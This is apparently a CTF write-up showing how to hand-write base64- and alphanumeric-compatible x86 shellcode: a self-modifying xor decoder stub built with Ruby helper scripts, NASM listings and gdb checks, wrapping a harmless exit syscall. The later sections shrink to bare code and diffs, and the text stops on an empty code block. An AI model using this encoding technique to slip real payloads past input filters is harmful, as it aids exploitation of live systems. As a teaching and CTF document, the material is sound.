Solving b-64-b-tuff: writing base64 and alphanumeric shellcode

Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There’s an easy solution - using an alphanumeric encoder - but what’s the fun in that? (also, I didn’t think of it :) ). I’m going to cover base64, but these exact same principles apply to alphanumeric - there’s absolutely no reason you couldn’t change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we’re going to write a base64-compatible decoder stub by hand and use it to wrap some super simple encoded shellcode. I’ll also post a link to a tool I wrote to automate this.

I can’t promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)

Intro to Shellcode

I don’t want to dwell too much on the basics, so I highly recommend reading PRIMER.md, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data is encoded into base64, then the base64 string is run as if it were machine code. That means that your machine code has to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign (“=”) or two on the end, but that’s not really useful.
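
Since that character set comes up constantly, a tiny checker can save some eyeballing of hexdumps. This is only a minimal sketch: the helper name base64_compatible? is made up for illustration and isn't part of any library or of the challenge itself.

```ruby
# The 64 characters a base64 string may contain (ignoring '=' padding)
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Hypothetical helper: true if every byte of the code is in SET
def base64_compatible?(code)
  allowed = SET.bytes
  code.bytes.all? { |b| allowed.include?(b) }
end

puts base64_compatible?('hAAAAX')       # push 0x41414141 / pop eax
puts base64_compatible?("\xcd\x80".b)   # int 0x80
```

The first call prints true and the second prints false, since 0xcd and 0x80 are nowhere near the allowed set.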

We’re going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it’d be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we’ll see used throughout this blog, but I didn’t keep that code. Instead, I’m going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require 'crabstone'

# Our set of known characters
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

# Create an instance of the Crabstone Disassembler for 32-bit x86
cs = Crabstone::Disassembler.new(Crabstone::ARCH_X86, Crabstone::MODE_32)

# Get every 2-character combination
SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Pad it out pretty far with obvious no-op-ish instructions
    data = c1 + c2 + ("A" * 14)

    # Disassemble it and get the first instruction (we only care about the
    # shortest instructions we can form)
    instruction = cs.disasm(data, 0)[0]

    puts "%s     %s %s" % [
      instruction.bytes.map() { |b| '%02x' % b }.join(' '),
      instruction.mnemonic.to_s,
      instruction.op_str.to_s
    ]
  end
end

I’d probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that’s easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that’s useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn’t be useful, but that I didn’t want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls (“int 0x80” in assembly or “\xcd\x80” in machine code; we’ll see how that winds up being the most problematic piece!).

For the purposes of this blog, we’re going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace.

Here’s the shellcode we’re going to be working with:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

We’ll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
[...]
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585)                        = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We’re going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!
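
If the jump from hex to that decimal number isn't obvious, here is a quick sanity check in Ruby. It's just arithmetic, nothing specific to the challenge:

```ruby
exit_code = 0x41414141

# The decimal form is what strace prints as the argument to exit()
puts exit_code

# Only the low byte survives as the process's exit status
puts exit_code & 0xff
```

The second number (65, or 0x41) is what a shell would report as the exit status.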

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let’s take a quick look at a simple character restriction: NUL bytes. It’s commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It’s usually pretty straightforward to get rid of NUL bytes by just looking at where they appear and fixing them; they’re almost always caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al, the low byte of eax, is 8 bits):

xor eax, eax ; Set eax to 0
inc eax ; Increment eax (set it to 1) - could also use "mov al, 1", but that's one byte longer
mov ebx, 0x41414141 ; Set ebx to the usual value, no NUL bytes here
int 0x80 ; Perform the syscall

We can prove this works, as well (I’m going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n'> file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  31 c0 40 bb 41 41 41 41  cd 80                    |1.@.AAAA..|

Simple!

Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let’s look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren’t so close: none of the lines are actually compatible. Even “inc eax” assembles to 0x40 (‘@’), which isn’t in the base64 set. I guess we can start the long journey!

Let’s start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

35 ?? ?? ?? ?? xor eax,0x????????
68 ?? ?? ?? ?? push dword 0x????????
58 pop eax

Let’s start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we’re pushing 0, we end up with a NUL byte. So let’s push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000  68 41 41 41 41 58                                 |hAAAAX|

Not only is it all Base64 compatible now, it also spells “hAAAAX”, which is a fun coincidence. :)

The problem is, eax doesn’t end up as 0, it’s 0x41414141. You can verify this by adding “int 3” at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you’re following along, I’m using it constantly to verify my code snippets, but I’ll only show it when the values are important):

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32

push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410008 in ?? ()
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don’t like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let’s do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41                 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let’s look at why!

We’ll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
      end
    end
  end
  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil
end

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])
end

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
...
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>
...

Basically, we can encode any value that doesn’t have the most-significant bit set (ie, anything under 0x80). That’s going to be a problem that we’ll deal with much, much later.
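
The reason is easy to see once you notice that every character in the set is plain ASCII, so bit 7 is clear in both operands and stays clear after the xor. Here's a short sketch that checks that and counts the reachable values (the variable names are just for illustration):

```ruby
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
set_bytes = SET.bytes

# Every character in the set is below 0x80, so bit 7 is never set
puts set_bytes.all? { |b| b < 0x80 }

# Collect every value we can reach by xoring two characters from the set
reachable = set_bytes.product(set_bytes).map { |b1, b2| b1 ^ b2 }.uniq.sort

puts '0x%02x..0x%02x (%d values)' % [reachable.first, reachable.last, reachable.size]
```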

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Convert the integer into a string (pack()), then into the four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Convert both sets of xor values back into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),
  ]


  # Note: I comment these out for many of the examples, simply for brevity
  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('----------')
  puts('0x%08x' % (result[0] ^ result[1]))
  puts()

  return result
end

This function takes a single 32-bit value and it outputs the two xor values (note that this won’t work when the most significant bit is set.. stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)
0x42414141
0x43434245
----------
0x01020304

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)
0x6a6a6a6a
0x2b2b2b2b
----------
0x41414141

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:

get_xor_values_32(0x01)
0x41414142
0x41414143
----------
0x00000001

=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it’s base-64-compatible; I believe in doing this, because every once in a while an instruction like “inc eax” (which becomes ‘@’) will slip in when I’m not paying attention:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41                 |hBAAAX5CAAA|

We’ll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It’s the most fundamental building block of this project!
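
Because the pattern is so mechanical, it's a natural thing to generate. The following is a rough sketch rather than the actual tool: find_pair and emit_set_eax are hypothetical names, and the search is the same brute force as find_bytes() above.

```ruby
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Same brute-force idea as find_bytes(): two set bytes that xor to b, or nil
def find_pair(b)
  SET.bytes.product(SET.bytes).find { |b1, b2| (b1 ^ b2) == b }
end

# Hypothetical helper: emit assembly that leaves `value` in eax
def emit_set_eax(value)
  pairs = [value].pack('N').bytes.map do |b|
    find_pair(b) or raise ArgumentError, 'byte 0x%02x has its MSB set' % b
  end

  # Glue the first and second halves of each byte pair back into 32-bit values
  first  = pairs.map { |p| p[0] }.pack('C4').unpack1('N')
  second = pairs.map { |p| p[1] }.pack('C4').unpack1('N')

  ['push 0x%08x' % first, 'pop eax', 'xor eax, 0x%08x' % second].join("\n")
end

puts emit_set_eax(0x00000001)
```

Running it for 0x00000001 prints the same three instructions we just wrote by hand. Any value with a byte of 0x80 or above raises an error, which is the limitation we still have to deal with.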

Setting other registers

Sadly, unless I missed something, there’s no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don’t have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

58 pop eax
59 pop ecx
5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143 ; eax -> 1
push eax
pop ecx ; ecx -> 1

Then verify the base64-ness:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 59           |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 5b           |hBAAAX5CAAAP[|

Note the “[” at the end - that’s not in our character set! So we’re pretty much limited to using eax, ecx, and edx for most things.
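
You can see the pattern without assembling anything: in 32-bit x86, "push reg" is the single byte 0x50 plus the register number, and "pop reg" is 0x58 plus the register number. A small sketch that checks those bytes against the set (the variable names are just for illustration):

```ruby
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Registers in x86 encoding order: eax is 0, ecx is 1, and so on
REGISTERS = %w[eax ecx edx ebx esp ebp esi edi]
set_bytes = SET.bytes

# "push reg" is 0x50 + n, "pop reg" is 0x58 + n
pushable = REGISTERS.select.with_index { |_, n| set_bytes.include?(0x50 + n) }
poppable = REGISTERS.select.with_index { |_, n| set_bytes.include?(0x58 + n) }

puts 'push: ' + pushable.join(' ')
puts 'pop:  ' + poppable.join(' ')
```

Every register can be pushed ('P' through 'W'), but only eax, ecx, and edx can be popped, because 0x5b and up fall just past 'Z'.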

But wait, there’s more! We do, however, have access to popad. The popad instruction pops the next 8 values off the stack into the general-purpose registers (the value that lines up with esp is thrown away rather than loaded). It’s a bit of a scorched-earth method, though, because it overwrites all of the other registers. We’re going to use it at the start of our code to zero-out all the registers.

Let’s try to convert our exit shellcode from earlier:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Into something that’s base-64 friendly:

; We'll start by populating the stack with 0x41414141's
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141

; Then popad to set all the registers to 0x41414141
popad

; Then set eax to 1
push 0x41414142
pop eax
xor eax, 0x41414143

; Finally, do our syscall (as usual, we're going to ignore the fact that the syscall isn't base64 compatible)
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000  68 41 41 41 41 68 41 41  41 41 68 41 41 41 41 68  |hAAAAhAAAAhAAAAh|
00000010  41 41 41 41 68 41 41 41  41 68 41 41 41 41 68 41  |AAAAhAAAAhAAAAhA|
00000020  41 41 41 68 41 41 41 41  61 68 42 41 41 41 58 35  |AAAhAAAAahBAAAX5|
00000030  43 41 41 41 cd 80                                 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
...
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585)                        = ?

Encoding the actual code

You’ve probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it’s our working register). And what if you need an instruction (like add, or shift) that isn’t available? Do we just simulate it?

As I’m sure you’ve noticed, the machine code is just a bunch of bytes. What’s stopping us from simply encoding the machine code rather than just values?

Let’s take our original example of an exit again:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Because ‘mov’ assembles to 0xb8XXXXXX, I don’t want to deal with that yet (the most-significant bit is set). So let’s change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b"

Let’s pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with ‘A’, because it’s as good a character as any):

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

6a 01 58 68 -> 0x6858016a
41 41 41 41 -> 0x41414141
5b 41 41 41 -> 0x4141415b
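
The padding and chunking can be done in a couple of lines of Ruby instead of by hand. A minimal sketch, with made-up variable names:

```ruby
payload = "\x6a\x01\x58\x68\x41\x41\x41\x41\x5b".b

# Pad with 'A' up to the next multiple of 4 bytes
padded = payload + 'A' * (-payload.bytesize % 4)

# 'V' unpacks 32-bit little-endian integers
chunks = padded.unpack('V*')

chunks.each { |c| puts '0x%08x' % c }
```

That prints the same three values as the list above.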

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let’s start our decoder by simply calculating each of these values in eax, just to prove that they’re all base64-compatible (note that we are simply discarding the values in this example, we aren’t doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b ; 0x6858016a

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b ; 0x41414141

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39 ; 0x4141415b

Which assembles to:

$ hexdump -Cv file
00000000  68 41 42 61 43 58 35 2b  43 39 2b 68 6a 6a 6a 6a  |hABaCX5+C9+hjjjj|
00000010  58 35 2b 2b 2b 2b 68 62  6a 6a 6a 58 35 39 2b 2b  |X5++++hbjjjX59++|
00000020  2b                                                |+|

Looking good so far!

Decoder stub

Okay, we’ve proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We’ll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let’s look back at the list of available instructions! After some searching, I found one that’s promising:

3151??            xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the “0x??” value has to also be a base64 character, we’ll follow our trend and use [ecx+0x41], which gives us:

315141            xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that’s basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let’s start by looking at the steps involved:

1. Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
2. Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
3. For each 32-bit pair in the encoded shellcode...
   - Load the other half of the xor pair into edx
   - Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
   - Increment ecx to point at the next value
   - Repeat for the full payload
4. Run the newly decoded payload

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; eax -> 0x41410100
push eax
pop ecx ; ecx -> 0x41410100

; Set edx to the first value in the first xor pair
push 0x43614241
pop edx

; xor it with the second value in the first xor pair (which is at ecx + 0x41)
xor [ecx+0x41], edx

; Move ecx to the next 32-bit value
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the second xor pair
push 0x6a6a6a6a
pop edx

; xor + increment ecx again
xor [ecx+0x41], edx
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the third and final xor pair, and xor it
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; At this point, I assembled the code and counted the bytes; we have exactly 0x30 bytes of code so far. That means to get our encoded shellcode to exactly 0x141 bytes after the start, we need 0x111 bytes of padding ('A' translates to inc ecx, so it's effectively a no-op because the encoded shellcode doesn't care what ecx starts as):
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAA'

; Now, the second halves of our xor pairs; this is what gets modified in-place
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; And finally, we're going to cheat and just do a syscall that's non-base64-compatible
int 0x80

$ hexdump -Cv file
00000000  68 41 42 6a 6a 58 35 41  43 2b 2b 50 59 68 41 42  |hABjjX5AC++PYhAB|
00000010  61 43 5a 31 51 41 41 41  41 41 68 6a 6a 6a 6a 5a  |aCZ1QAAAAAhjjjjZ|
00000020  31 51 41 41 41 41 41 68  62 6a 6a 6a 5a 31 51 41  |1QAAAAAhbjjjZ1QA|
00000030  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000040  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000050  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000090  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000100  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000110  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000120  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 2b 43 39 2b 2b 2b 2b  2b 39 2b 2b 2b cd 80     |A+C9+++++9+++..|
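
Before running anything, the layout and the decode step can be sanity-checked offline. This is a sketch under the assumptions used in this post: the code is loaded at 0x41410000, the stub is 0x30 bytes, and the encoded data sits at offset 0x141. The constant names are invented for the example.

```ruby
BASE        = 0x41410000 # assumed load address
DATA_OFFSET = 0x141      # where the encoded dwords start
STUB_LENGTH = 0x30       # size of the decoder stub before the padding

# Padding needed between the stub and the encoded data
puts 'padding: 0x%x' % (DATA_OFFSET - STUB_LENGTH)

# ecx has to sit 0x41 bytes before the data, because we use [ecx+0x41]
puts 'ecx:     0x%08x' % (BASE + DATA_OFFSET - 0x41)

# What the three "xor [ecx+0x41], edx" steps do to the encoded data
in_memory = [0x2b39432b, 0x2b2b2b2b, 0x2b2b2b39] # the dd values
in_edx    = [0x43614241, 0x6a6a6a6a, 0x6a6a6a62] # the pushed values
decoded   = in_memory.zip(in_edx).map { |m, k| m ^ k }.pack('V*')

puts decoded.bytes.map { |b| '%02x' % b }.join(' ')
```

The last line should match the padded payload from earlier: 6a 01 58 68, four 0x41s, then 5b and three more 0x41s.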

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){
     exit(0);
   }

-  void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+  void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
   printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);

   FILE *file = fopen(argv[1], "rb");

$ gcc -m32 -o run_raw_code run_raw_code.c

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
[...]
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585)                        = ?

$ diff -u file.asm file-trap.asm
--- file.asm    2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm       2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
-db 'AAAAAAAAAAAAAAAAA'
+db 'AAAAAAAAAAAAAAAA', 0xcc

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410141 in ?? ()
(gdb) x/10i $eip
=> 0x41410141:  push   0x1
   0x41410143:  pop    eax
   0x41410144:  push   0x41414141
   0x41410149:  pop    ebx
   0x4141014a:  inc    ecx
   0x4141014b:  inc    ecx
   0x4141014c:  inc    ecx
   0x4141014d:  int    0x80
   0x4141014f:  add    BYTE PTR [eax],al
   0x41410151:  add    BYTE PTR [eax],al

That pesky most-significant-bit

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F

; Now that edx is 0x7F, we can simply increment it
inc edx ; edx -> 0x80

00000000  68 46 41 41 41 58 35 39  41 41 41 50 5a 42        |hFAAAX59AAAPZB|

xor [ecx+0x41], edx

Setting edx to 0x00008000, 0x00800000, or 0x80000000

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier (we need a register that's reliably 0)
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set edx to 0x00000080, just like before
push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F
inc edx ; edx -> 0x80

; Push edi (which, like all registers, is 0) onto the stack
push edi ; 0x00000000

; Push edx onto the stack
push edx

; Move esp by 1 byte - note that this won't work on many architectures, but x86/x64 are fine with a misaligned stack
dec esp

; Get edx back, shifted by one byte
pop edx

; Fix the stack (not really necessary, but it's nice to do it)
inc esp

; Add a debug breakpoint so we can inspect the value
int 3

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410029 in ?? ()
(gdb) print/x $edx
$1 = 0x8000

push edi ; 0x00000000
push edx
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp ; <-- New

push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp
inc esp ; <-- New
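
The three variants differ only in how many times esp is decremented, so they can be generated from one template. This is a hedged sketch: emit_msb_mask is a hypothetical helper, and it assumes edi is 0 and the stack memory involved is already zeroed, as it is after the popad setup above.

```ruby
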